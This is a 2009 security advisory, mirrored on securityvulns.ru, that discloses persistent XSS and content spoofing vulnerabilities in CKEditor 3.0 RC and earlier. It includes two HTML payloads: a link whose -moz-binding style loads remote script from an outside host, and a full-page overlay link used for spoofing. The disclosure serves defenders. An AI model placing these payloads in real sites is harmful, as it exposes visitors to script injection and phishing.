Computer Security

Security Advisory: XSS and Content Spoofing vulnerabilities in CKEditor
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1897-1] New horde3 packages fix arbitrary code execution

  [ONSEC-09-010] Undersky CMS SQL injection

  [ONSEC-09-017] Blogolet PHP including

  [ONSEC-09-016] Blogolet XSS

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:28.09.2009
Subject:XSS and Content Spoofing vulnerabilities in CKEditor

Hello 3APA3A!

I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor.

XSS:

This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the
style.

<a href="http://test"
style="-moz-binding:url('lass="fixed">http://websecurity.com.ua/webtools/xss.xml#xss')">te
st</a>

This vulnerability works in Mozilla and Firefox (before Firefox 3.0).

Content Spoofing:

This is Persistent Content Spoofing vulnerability.

<a href="http://websecurity.com.ua"
style="width:100%;height:100%;display:block;position:absolute;top:
0px;left:0px">&nbsp;</a>

These vulnerabilities are in editor itself, so they can be used at any site, which use CKeditor
as editor of web forms.

Vulnerable are CKEditor 3.0 RC and previous versions.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/3304/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru